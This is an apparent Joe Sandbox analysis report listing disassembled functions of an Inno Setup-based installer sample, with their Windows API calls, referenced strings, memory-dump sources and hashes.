                                                                                        • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                        • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                        • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                        • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                        APIs
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                        Strings
                                                                                        • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                        • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                        • API String ID: 3535843008-1938159461
                                                                                        • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                        • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                        • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                        • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                        • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                        Strings
                                                                                        • Will not restart Windows automatically., xrefs: 004836F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveForeground
                                                                                        • String ID: Will not restart Windows automatically.
                                                                                        • API String ID: 307657957-4169339592
                                                                                        • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                        • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                        • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                        • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                        APIs
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
                                                                                        • SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
                                                                                        Strings
                                                                                        • Extracting temporary file: , xrefs: 004763EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileTime$Local
                                                                                        • String ID: Extracting temporary file:
                                                                                        • API String ID: 791338737-4171118009
                                                                                        • Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                        • Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
                                                                                        • Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
                                                                                        • Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
                                                                                        Strings
                                                                                        • Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
                                                                                        • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                        • API String ID: 0-1974262853
                                                                                        • Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                        • Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
                                                                                        • Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
                                                                                        • Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                        • %s\%s_is1, xrefs: 00478F10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                        • API String ID: 47109696-1598650737
                                                                                        • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                        • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                        • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                        • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteMessageSendShell
                                                                                        • String ID: open
                                                                                        • API String ID: 812272486-2758837156
                                                                                        • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                        • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                        • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                        • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                        APIs
                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                        • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                        • String ID: <
                                                                                        • API String ID: 893404051-4251816714
                                                                                        • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                        • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                        • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                        • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                          • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                          • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                          • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                          • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0217C330,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                        • String ID: )
                                                                                        • API String ID: 2227675388-1084416617
                                                                                        • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                        • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                        • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                        • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window
                                                                                        • String ID: /INITPROCWND=$%x $@
                                                                                        • API String ID: 2353593579-4169826103
                                                                                        • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                        • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                        • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                        • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                        APIs
                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$AllocByteCharFreeMultiWide
                                                                                        • String ID: NIL Interface Exception$Unknown Method
                                                                                        • API String ID: 3952431833-1023667238
                                                                                        • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                        • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                        • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                        • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                        • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                          • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorHandleLastProcess
                                                                                        • String ID: 0nI
                                                                                        • API String ID: 3798668922-794067871
                                                                                        • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                        • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                        • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                        • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$EnumQuery
                                                                                        • String ID: Inno Setup: No Icons
                                                                                        • API String ID: 1576479698-2016326496
                                                                                        • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                        • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                        • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                        • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                        • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesErrorFileLast
                                                                                        • String ID: T$H
                                                                                        • API String ID: 1799206407-488339322
                                                                                        • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                        • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                        • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                        • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                        APIs
                                                                                        • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteErrorFileLast
                                                                                        • String ID: T$H
                                                                                        • API String ID: 2018770650-488339322
                                                                                        • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                        • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                        • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                        • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                        APIs
                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                        • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryErrorLastRemove
                                                                                        • String ID: T$H
                                                                                        • API String ID: 377330604-488339322
                                                                                        • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                        • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                        • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                        • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                        APIs
                                                                                          • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                                          • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                          • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                        • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                        • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                        Strings
                                                                                        • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
